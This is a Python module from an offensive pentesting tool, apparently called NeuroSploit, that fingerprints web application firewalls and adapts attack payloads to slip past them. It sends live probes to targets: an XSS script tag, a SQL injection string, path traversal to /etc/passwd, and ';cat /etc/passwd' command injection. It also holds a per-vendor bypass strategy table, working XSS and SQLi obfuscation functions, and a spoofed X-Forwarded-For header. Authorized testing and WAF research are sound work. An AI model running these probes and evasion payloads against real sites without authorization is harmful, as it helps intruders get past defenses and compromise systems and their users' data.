mirror of
https://github.com/CyberSecurityUP/NeuroSploit.git
synced 2026-02-12 14:02:45 +00:00
534 lines
18 KiB
Python
534 lines
18 KiB
Python
"""
|
|
NeuroSploit v3 - WAF Detector
|
|
|
|
WAF fingerprinting, bypass strategy database, and payload adaptation
|
|
for autonomous pentesting. Detects 15+ WAF vendors and provides
|
|
per-WAF bypass techniques.
|
|
"""
|
|
|
|
import logging
|
|
import re
|
|
from dataclasses import dataclass, field
|
|
from typing import Dict, List, Optional, Any
|
|
|
|
logger = logging.getLogger(__name__)
|
|
|
|
|
|
@dataclass
|
|
class WAFMatch:
|
|
"""A detected WAF."""
|
|
name: str # "cloudflare", "aws_waf", etc.
|
|
confidence: float # 0.0-1.0
|
|
detection_method: str # "header", "body", "server", "probe"
|
|
evidence: str
|
|
|
|
|
|
@dataclass
|
|
class WAFResult:
|
|
"""Complete WAF detection result."""
|
|
detected_wafs: List[WAFMatch] = field(default_factory=list)
|
|
blocking_patterns: Dict[str, bool] = field(default_factory=dict)
|
|
recommended_delay: float = 0.1
|
|
|
|
|
|
# 15+ WAF signatures
|
|
WAF_SIGNATURES = {
|
|
"cloudflare": {
|
|
"headers": ["cf-ray", "cf-request-id", "cf-cache-status"],
|
|
"body": ["cloudflare", "ray id:", "error 1020", "error 1015"],
|
|
"server": ["cloudflare"],
|
|
},
|
|
"aws_waf": {
|
|
"headers": ["x-amzn-requestid", "x-amzn-errortype"],
|
|
"body": ["request blocked", "aws waf"],
|
|
"server": ["cloudfront", "amazons3"],
|
|
},
|
|
"akamai": {
|
|
"headers": ["x-akamai-session-info", "akamai-origin-hop"],
|
|
"body": ["akamai", "ghost"],
|
|
"server": ["akamaighost"],
|
|
},
|
|
"imperva": {
|
|
"headers": ["x-iinfo", "x-cdn"],
|
|
"body": ["imperva", "incapsula incident", "incapsula"],
|
|
"server": ["imperva"],
|
|
},
|
|
"modsecurity": {
|
|
"headers": ["x-denied-reason", "x-modsecurity"],
|
|
"body": ["mod_security", "modsecurity", "noyb"],
|
|
"server": [],
|
|
},
|
|
"f5_bigip": {
|
|
"headers": ["x-waf-status", "x-cnection"],
|
|
"body": ["the requested url was rejected"],
|
|
"server": ["big-ip", "bigip", "f5"],
|
|
},
|
|
"sucuri": {
|
|
"headers": ["x-sucuri-id", "x-sucuri-cache"],
|
|
"body": ["sucuri", "sucuri website firewall", "cloudproxy"],
|
|
"server": ["sucuri"],
|
|
},
|
|
"barracuda": {
|
|
"headers": ["barra_counter_session"],
|
|
"body": ["barracuda", "barracuda networks"],
|
|
"server": [],
|
|
},
|
|
"fortinet": {
|
|
"headers": ["x-fw-server"],
|
|
"body": ["fortigate", "fortiweb", "fortinet"],
|
|
"server": ["fortiweb"],
|
|
},
|
|
"citrix": {
|
|
"headers": ["citrix-transactionid", "cneonction", "nncoection"],
|
|
"body": ["citrix", "netscaler appfw"],
|
|
"server": ["netscaler"],
|
|
},
|
|
"azure_waf": {
|
|
"headers": ["x-azure-ref", "x-ms-forbidden-ip"],
|
|
"body": ["azure application gateway", "azure front door"],
|
|
"server": ["microsoft-azure-application-gateway"],
|
|
},
|
|
"gcp_armor": {
|
|
"headers": ["x-cloud-trace-context"],
|
|
"body": ["google cloud armor", "forbidden by security policy"],
|
|
"server": ["google frontend", "gfe"],
|
|
},
|
|
"wordfence": {
|
|
"headers": [],
|
|
"body": ["wordfence", "generated by wordfence", "this response was generated by wordfence"],
|
|
"server": [],
|
|
},
|
|
"cloudfront": {
|
|
"headers": ["x-amz-cf-id", "x-amz-cf-pop"],
|
|
"body": ["cloudfront", "error from cloudfront"],
|
|
"server": ["cloudfront"],
|
|
},
|
|
"fastly": {
|
|
"headers": ["x-fastly-request-id", "fastly-restarts"],
|
|
"body": ["fastly error"],
|
|
"server": ["fastly"],
|
|
},
|
|
"reblaze": {
|
|
"headers": ["rbzid"],
|
|
"body": ["reblaze", "access denied (rbz)"],
|
|
"server": ["reblaze"],
|
|
},
|
|
}
|
|
|
|
# Bypass strategies per WAF
|
|
BYPASS_STRATEGIES = {
|
|
"cloudflare": {
|
|
"xss": [
|
|
"unicode_escape", # \u003cscript\u003e
|
|
"svg_payload", # <svg onload=...>
|
|
"comment_injection", # <scr<!---->ipt>
|
|
"case_mixing", # <ScRiPt>
|
|
"html_entity", # <script>
|
|
],
|
|
"sqli": [
|
|
"inline_comment", # /*!50000UNION*/
|
|
"case_mixing", # uNiOn SeLeCt
|
|
"whitespace_variant", # UNION%0bSELECT
|
|
"scientific_notation", # 1e0UNION
|
|
],
|
|
"general": {
|
|
"delay": 0.3,
|
|
"headers": {"X-Forwarded-For": "127.0.0.1"},
|
|
},
|
|
},
|
|
"modsecurity": {
|
|
"xss": [
|
|
"inline_comment",
|
|
"case_mixing",
|
|
"whitespace_variant",
|
|
"null_byte",
|
|
],
|
|
"sqli": [
|
|
"inline_comment", # /*!50000OR*/
|
|
"case_mixing",
|
|
"double_encoding", # %2527
|
|
"whitespace_variant", # tab, newline, %0a
|
|
],
|
|
"general": {
|
|
"delay": 0.2,
|
|
},
|
|
},
|
|
"aws_waf": {
|
|
"xss": [
|
|
"double_encoding",
|
|
"null_byte",
|
|
"unicode_escape",
|
|
"svg_payload",
|
|
],
|
|
"sqli": [
|
|
"double_encoding", # %253C = <
|
|
"null_byte", # \x00
|
|
"scientific_notation", # 1e0=1
|
|
"concat_function", # CONCAT(0x27,...)
|
|
],
|
|
"general": {
|
|
"delay": 0.2,
|
|
},
|
|
},
|
|
"imperva": {
|
|
"xss": [
|
|
"unicode_escape",
|
|
"html_entity",
|
|
"svg_payload",
|
|
"comment_injection",
|
|
],
|
|
"sqli": [
|
|
"inline_comment",
|
|
"hex_encoding",
|
|
"whitespace_variant",
|
|
],
|
|
"general": {
|
|
"delay": 0.5,
|
|
},
|
|
},
|
|
"generic": {
|
|
"xss": [
|
|
"case_mixing",
|
|
"unicode_escape",
|
|
"svg_payload",
|
|
"html_entity",
|
|
],
|
|
"sqli": [
|
|
"inline_comment",
|
|
"case_mixing",
|
|
"whitespace_variant",
|
|
],
|
|
"general": {
|
|
"delay": 0.3,
|
|
"headers": {"X-Forwarded-For": "127.0.0.1"},
|
|
},
|
|
},
|
|
}
|
|
|
|
|
|
class WAFDetector:
|
|
"""WAF fingerprinting and bypass strategy engine.
|
|
|
|
Usage:
|
|
detector = WAFDetector(request_engine)
|
|
result = await detector.detect(url)
|
|
if result.detected_wafs:
|
|
adapted = detector.adapt_payload(payload, waf_name, vuln_type)
|
|
"""
|
|
|
|
# Probe payloads that trigger WAF responses
|
|
PROBE_PAYLOADS = {
|
|
"xss": "<script>alert(1)</script>",
|
|
"sqli": "' OR 1=1--",
|
|
"lfi": "../../etc/passwd",
|
|
"rce": ";cat /etc/passwd",
|
|
}
|
|
|
|
def __init__(self, request_engine=None):
|
|
self.request_engine = request_engine
|
|
self._cache: Dict[str, WAFResult] = {} # url -> result
|
|
|
|
async def detect(self, url: str) -> WAFResult:
|
|
"""Detect WAFs on the target URL.
|
|
|
|
Phase 1: Passive detection (headers/body from normal response)
|
|
Phase 2: Active probing (send trigger payloads, analyze blocks)
|
|
"""
|
|
from urllib.parse import urlparse
|
|
host = urlparse(url).netloc
|
|
if host in self._cache:
|
|
return self._cache[host]
|
|
|
|
detected: List[WAFMatch] = []
|
|
blocking: Dict[str, bool] = {}
|
|
|
|
# Phase 1: Passive detection from baseline request
|
|
if self.request_engine:
|
|
try:
|
|
result = await self.request_engine.request(url, method="GET")
|
|
if result:
|
|
passive_wafs = self._check_signatures(
|
|
result.headers, result.body, result.status
|
|
)
|
|
detected.extend(passive_wafs)
|
|
except Exception as e:
|
|
logger.debug(f"WAF passive detection error: {e}")
|
|
|
|
# Phase 2: Active probing (only if request engine available)
|
|
if self.request_engine:
|
|
for probe_type, payload in self.PROBE_PAYLOADS.items():
|
|
try:
|
|
probe_url = f"{url}?test={payload}"
|
|
result = await self.request_engine.request(
|
|
probe_url, method="GET"
|
|
)
|
|
if result:
|
|
if result.status in (403, 406, 429, 501):
|
|
blocking[probe_type] = True
|
|
probe_wafs = self._check_signatures(
|
|
result.headers, result.body, result.status
|
|
)
|
|
for w in probe_wafs:
|
|
if not any(d.name == w.name for d in detected):
|
|
w.detection_method = "probe"
|
|
detected.append(w)
|
|
else:
|
|
blocking[probe_type] = False
|
|
except Exception:
|
|
pass
|
|
|
|
# Determine recommended delay
|
|
delay = 0.1
|
|
if detected:
|
|
primary_waf = detected[0].name
|
|
strategy = BYPASS_STRATEGIES.get(primary_waf, BYPASS_STRATEGIES["generic"])
|
|
delay = strategy.get("general", {}).get("delay", 0.3)
|
|
|
|
waf_result = WAFResult(
|
|
detected_wafs=detected,
|
|
blocking_patterns=blocking,
|
|
recommended_delay=delay,
|
|
)
|
|
self._cache[host] = waf_result
|
|
|
|
if detected:
|
|
waf_names = ", ".join(f"{w.name}({w.confidence:.0%})" for w in detected)
|
|
logger.info(f"WAF detected on {host}: {waf_names}")
|
|
|
|
return waf_result
|
|
|
|
def _check_signatures(
|
|
self,
|
|
headers: Dict[str, str],
|
|
body: str,
|
|
status: int,
|
|
) -> List[WAFMatch]:
|
|
"""Check response against WAF signature database."""
|
|
matches = []
|
|
headers_lower = {k.lower(): v.lower() for k, v in headers.items()}
|
|
body_lower = (body or "").lower()[:5000]
|
|
server = headers_lower.get("server", "")
|
|
|
|
for waf_name, sigs in WAF_SIGNATURES.items():
|
|
evidence_parts = []
|
|
confidence = 0.0
|
|
|
|
# Check headers
|
|
for h in sigs.get("headers", []):
|
|
if h.lower() in headers_lower:
|
|
evidence_parts.append(f"header:{h}")
|
|
confidence += 0.4
|
|
|
|
# Check body
|
|
for b in sigs.get("body", []):
|
|
if b.lower() in body_lower:
|
|
evidence_parts.append(f"body:{b}")
|
|
confidence += 0.3
|
|
|
|
# Check server header
|
|
for s in sigs.get("server", []):
|
|
if s.lower() in server:
|
|
evidence_parts.append(f"server:{s}")
|
|
confidence += 0.5
|
|
|
|
if evidence_parts:
|
|
confidence = min(1.0, confidence)
|
|
matches.append(WAFMatch(
|
|
name=waf_name,
|
|
confidence=confidence,
|
|
detection_method="header" if any("header:" in e for e in evidence_parts) else "body",
|
|
evidence=", ".join(evidence_parts),
|
|
))
|
|
|
|
# Sort by confidence
|
|
matches.sort(key=lambda m: m.confidence, reverse=True)
|
|
return matches
|
|
|
|
def get_bypass_strategy(self, waf_name: str, vuln_type: str) -> Dict:
|
|
"""Get bypass strategy for a specific WAF + vuln type combination."""
|
|
strategies = BYPASS_STRATEGIES.get(waf_name, BYPASS_STRATEGIES["generic"])
|
|
|
|
# Normalize vuln type to category
|
|
category = self._vuln_to_category(vuln_type)
|
|
techniques = strategies.get(category, strategies.get("xss", []))
|
|
general = strategies.get("general", {})
|
|
|
|
return {
|
|
"techniques": techniques,
|
|
"delay": general.get("delay", 0.3),
|
|
"extra_headers": general.get("headers", {}),
|
|
}
|
|
|
|
def adapt_payload(
|
|
self, payload: str, waf_name: str, vuln_type: str
|
|
) -> List[str]:
|
|
"""Generate bypass variants of a payload for a specific WAF.
|
|
|
|
Returns list of adapted payloads, with original as fallback.
|
|
"""
|
|
strategy = self.get_bypass_strategy(waf_name, vuln_type)
|
|
adapted = []
|
|
|
|
for technique in strategy.get("techniques", []):
|
|
variant = self._apply_technique(payload, technique, vuln_type)
|
|
if variant and variant != payload:
|
|
adapted.append(variant)
|
|
|
|
# Deduplicate while preserving order
|
|
seen = set()
|
|
unique = []
|
|
for p in adapted:
|
|
if p not in seen:
|
|
seen.add(p)
|
|
unique.append(p)
|
|
|
|
return unique[:8] # Max 8 variants
|
|
|
|
def _vuln_to_category(self, vuln_type: str) -> str:
|
|
"""Map specific vuln type to WAF bypass category."""
|
|
sqli_types = {"sqli_error", "sqli_blind", "sqli_union", "sqli_time",
|
|
"sqli", "nosql_injection"}
|
|
xss_types = {"xss_reflected", "xss_stored", "xss_dom", "xss"}
|
|
|
|
if vuln_type in sqli_types:
|
|
return "sqli"
|
|
if vuln_type in xss_types:
|
|
return "xss"
|
|
return "xss" # Default category
|
|
|
|
def _apply_technique(self, payload: str, technique: str, vuln_type: str) -> Optional[str]:
|
|
"""Apply a specific bypass technique to a payload."""
|
|
try:
|
|
if technique == "unicode_escape":
|
|
return self._unicode_escape(payload)
|
|
elif technique == "case_mixing":
|
|
return self._case_mix(payload)
|
|
elif technique == "double_encoding":
|
|
return self._double_encode(payload)
|
|
elif technique == "null_byte":
|
|
return self._null_byte(payload)
|
|
elif technique == "comment_injection":
|
|
return self._comment_inject(payload)
|
|
elif technique == "inline_comment":
|
|
return self._inline_comment(payload)
|
|
elif technique == "whitespace_variant":
|
|
return self._whitespace_variant(payload)
|
|
elif technique == "svg_payload":
|
|
return self._svg_variant(payload)
|
|
elif technique == "html_entity":
|
|
return self._html_entity(payload)
|
|
elif technique == "scientific_notation":
|
|
return self._scientific_notation(payload)
|
|
elif technique == "hex_encoding":
|
|
return self._hex_encode(payload)
|
|
elif technique == "concat_function":
|
|
return self._concat_function(payload)
|
|
except Exception:
|
|
pass
|
|
return None
|
|
|
|
# --- Bypass technique implementations ---
|
|
|
|
def _unicode_escape(self, payload: str) -> str:
|
|
"""Replace key characters with unicode escapes."""
|
|
replacements = {
|
|
"<": "\\u003c", ">": "\\u003e", "'": "\\u0027",
|
|
'"': "\\u0022", "/": "\\u002f",
|
|
}
|
|
result = payload
|
|
for old, new in replacements.items():
|
|
result = result.replace(old, new)
|
|
return result
|
|
|
|
def _case_mix(self, payload: str) -> str:
|
|
"""Alternate case: <ScRiPt>, uNiOn SeLeCt."""
|
|
result = []
|
|
upper = True
|
|
for c in payload:
|
|
if c.isalpha():
|
|
result.append(c.upper() if upper else c.lower())
|
|
upper = not upper
|
|
else:
|
|
result.append(c)
|
|
return "".join(result)
|
|
|
|
def _double_encode(self, payload: str) -> str:
|
|
"""Double URL-encode special characters."""
|
|
import urllib.parse
|
|
# First encode
|
|
encoded = urllib.parse.quote(payload, safe="")
|
|
# Encode the % signs
|
|
return encoded.replace("%", "%25")
|
|
|
|
def _null_byte(self, payload: str) -> str:
|
|
"""Insert null bytes before key characters."""
|
|
return payload.replace("<", "%00<").replace("'", "%00'").replace('"', '%00"')
|
|
|
|
def _comment_inject(self, payload: str) -> str:
|
|
"""Inject HTML comments into tags."""
|
|
# <script> -> <scr<!---->ipt>
|
|
payload = payload.replace("<script>", "<scr<!---->ipt>")
|
|
payload = payload.replace("</script>", "</scr<!---->ipt>")
|
|
return payload
|
|
|
|
def _inline_comment(self, payload: str) -> str:
|
|
"""SQL inline comment bypass: UNION -> /*!50000UNION*/"""
|
|
keywords = ["UNION", "SELECT", "OR", "AND", "FROM", "WHERE"]
|
|
result = payload
|
|
for kw in keywords:
|
|
result = re.sub(
|
|
rf'\b{kw}\b',
|
|
f'/*!50000{kw}*/',
|
|
result,
|
|
flags=re.IGNORECASE
|
|
)
|
|
return result
|
|
|
|
def _whitespace_variant(self, payload: str) -> str:
|
|
"""Replace spaces with alternative whitespace."""
|
|
alternatives = ["%09", "%0a", "%0b", "%0c", "%0d", "%a0"]
|
|
result = payload
|
|
for alt in alternatives[:2]:
|
|
result = result.replace(" ", alt, 1)
|
|
return result
|
|
|
|
def _svg_variant(self, payload: str) -> str:
|
|
"""Convert XSS to SVG-based payload."""
|
|
# Extract the JS code if possible
|
|
match = re.search(r'(?:alert|confirm|prompt)\([^)]*\)', payload)
|
|
if match:
|
|
js_code = match.group(0)
|
|
return f'<svg onload="{js_code}">'
|
|
return '<svg/onload=alert(1)>'
|
|
|
|
def _html_entity(self, payload: str) -> str:
|
|
"""Encode with HTML entities."""
|
|
replacements = {
|
|
"<": "<", ">": ">", "'": "'",
|
|
'"': """, "/": "/",
|
|
}
|
|
result = payload
|
|
for old, new in replacements.items():
|
|
result = result.replace(old, new)
|
|
return result
|
|
|
|
def _scientific_notation(self, payload: str) -> str:
|
|
"""Use scientific notation for SQL: 1 OR -> 1e0OR"""
|
|
return re.sub(r'(\d+)\s+(OR|AND|UNION)', r'\1e0\2', payload, flags=re.IGNORECASE)
|
|
|
|
def _hex_encode(self, payload: str) -> str:
|
|
"""Hex-encode string literals in SQL."""
|
|
def to_hex(match):
|
|
s = match.group(1)
|
|
hex_str = "0x" + s.encode().hex()
|
|
return hex_str
|
|
return re.sub(r"'([^']+)'", to_hex, payload)
|
|
|
|
def _concat_function(self, payload: str) -> str:
|
|
"""Use CONCAT() to build strings."""
|
|
def concat_str(match):
|
|
s = match.group(1)
|
|
chars = ",".join(f"CHAR({ord(c)})" for c in s)
|
|
return f"CONCAT({chars})"
|
|
return re.sub(r"'([^']+)'", concat_str, payload)
|